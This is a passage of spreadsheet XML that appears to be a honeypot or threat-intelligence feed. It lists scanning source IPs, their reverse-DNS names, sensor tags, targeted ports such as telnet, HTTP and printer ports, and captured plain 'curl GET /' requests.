    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;6067&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:3b7f:ebe7</t>
  </si>
  <si>
    <t>ae2fc5dbfefa5eea4c745c0527ad1245</t>
  </si>
  <si>
    <t>114.33.77.154</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-77-154.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H44</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;34025&amp;&amp;9100&amp;&amp;NA&amp;&amp;8119</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:4d9a</t>
  </si>
  <si>
    <t>8c3870a094bfc8528c5934722aff77d0</t>
  </si>
  <si>
    <t>114.35.175.31</t>
  </si>
  <si>
    <t>114-35-175-31.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_DNS_H22&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;53&amp;&amp;34725&amp;&amp;80&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7223:af1f</t>
  </si>
  <si>
    <t>669a367bad47d880c7687d068ba8bd57</t>
  </si>
  <si>
    <t>114.33.29.101</t>
  </si>
  <si>
    <t>114-33-29-101.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H39</t>
  </si>
  <si>
    <t>32275&amp;&amp;80&amp;&amp;23&amp;&amp;56440&amp;&amp;56454&amp;&amp;9100&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:1d65</t>
  </si>
  <si>
    <t>f5df2574239ae3df295a2ae9b32528e2</t>
  </si>
  <si>
    <t>160.178.101.99</t>
  </si>
  <si>
    <t>MT-MPLS</t>
  </si>
  <si>
    <t>::ffff:a0b2:6563</t>
  </si>
  <si>
    <t>cbf3a413107338b4612b491212119ca0</t>
  </si>
  <si>
    <t>220.135.89.91</t>
  </si>
  <si>
    <t>220-135-89-91.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H35</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6503&amp;&amp;23&amp;&amp;80&amp;&amp;33746&amp;&amp;NA&amp;&amp;27351&amp;&amp;39788&amp;&amp;57205&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:dc87:595b</t>
  </si>
  <si>
    <t>228a947a868a536451f38d3eba963f37</t>
  </si>
  <si>
    <t>125.229.195.249</t>
  </si>
  <si>
    <t>125-229-195-249.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H20</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;45077&amp;&amp;23&amp;&amp;9100&amp;&amp;48384</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:c3f9</t>
  </si>
  <si>
    <t>732c08abe13bcbb6b7c0698368c363f7</t>
  </si>
  <si>
    <t>220.134.21.67</t>
  </si>
  <si>
    <t>NA&amp;&amp;220-134-21-67.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H46</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;35392&amp;&amp;9100&amp;&amp;37507</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:dc86:1543</t>
  </si>
  <si>
    <t>b94636fa91ea389b32c92f0ffb5d14ea</t>
  </si>
  <si>
    <t>125.229.4.85</t>
  </si>
  <si>
    <t>125-229-4-85.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H31</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;80&amp;&amp;49284&amp;&amp;9100&amp;&amp;20763</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7de5:455</t>
  </si>
  <si>
    <t>4be46d87072e96536d5bb78288d4e578</t>
  </si>
  <si>
    <t>110.227.156.68</t>
  </si>
  <si>
    <t>1266049</t>
  </si>
  <si>
    <t>25.1825</t>
  </si>
  <si>
    <t>75.8391</t>
  </si>
  <si>
    <t>::ffff:6ee3:9c44</t>
  </si>
  <si>
    <t>1293a49c0556c9bbfac0db3d03293886</t>
  </si>
  <si>
    <t>218.161.83.188</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-83-188.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H30&amp;&amp;SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;20214&amp;&amp;23&amp;&amp;80&amp;&amp;9100&amp;&amp;43678&amp;&amp;34445&amp;&amp;34451</t>
  </si>
  <si>
    <t>::ffff:daa1:53bc</t>
  </si>
  <si>
    <t>72cfa7b64eabed9da2e98ba613281bf0</t>
  </si>
  <si>
    <t>59.126.180.239</t>
  </si>
  <si>
    <t>59-126-180-239.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H25</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;80&amp;&amp;56354&amp;&amp;23&amp;&amp;9100&amp;&amp;60140</t>
  </si>
  <si>
    <t>::ffff:3b7e:b4ef</t>
  </si>
  <si>
    <t>ef905b8cd2ec462bfdfc9b557fc484b3</t>
  </si>
  <si>
    <t>218.161.74.229</t>
  </si>
  <si>
    <t>NA&amp;&amp;218-161-74-229.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>::ffff:daa1:4ae5</t>
  </si>
  <si>
    <t>23cc626927d0e27d197e27c0840b85be</t>
  </si>
  <si>
    <t>114.32.126.61</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-32-126-61.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_RDP_H3&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_TELNET_H7</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;3389&amp;&amp;21808&amp;&amp;23&amp;&amp;55979&amp;&amp;29435&amp;&amp;56006&amp;&amp;80&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7220:7e3d</t>
  </si>
  <si>
    <t>cba3d3cca07e3e20a5071866c5ab105d</t>
  </si>
  <si>
    <t>103.106.195.113</t>
  </si>
  <si>
    <t>Elyzium Consulting</t>
  </si>
  <si>
    <t>::ffff:676a:c371</t>
  </si>
  <si>
    <t>4b75df01950b55d8cc97bee0778f0872</t>
  </si>
  <si>
    <t>81.167.10.205</t>
  </si>
  <si>
    <t>NA&amp;&amp;205.81-167-10.customer.lyse.net</t>
  </si>
  <si>
    <t>Rogaland</t>
  </si>
  <si>
    <t>Stavanger</t>
  </si>
  <si>
    <t>3137115</t>
  </si>
  <si>
    <t>4001</t>
  </si>
  <si>
    <t>58.97</t>
  </si>
  <si>
    <t>5.73311</t>
  </si>
  <si>
    <t>29695</t>
  </si>
  <si>
    <t>Altibox</t>
  </si>
  <si>
    <t>2005-01-04</t>
  </si>
  <si>
    <t>::ffff:51a7:acd</t>
  </si>
  <si>
    <t>a7938d6ebabedd8323f3fde84957e113</t>
  </si>
  <si>
    <t>103.30.65.45</t>
  </si>
  <si>
    <t>::ffff:671e:412d</t>
  </si>
  <si>
    <t>cc32336976ca7ef2dff9edf4058532e7</t>
  </si>
  <si>
    <t>117.194.242.255</t>
  </si>
  <si>
    <t>::ffff:75c2:f2ff</t>
  </si>
  <si>
    <t>56c6ca6682a43031239af2540d7f9cdf</t>
  </si>
  <si>
    <t>117.204.20.87</t>
  </si>
  <si>
    <t>::ffff:75cc:1457</t>
  </si>
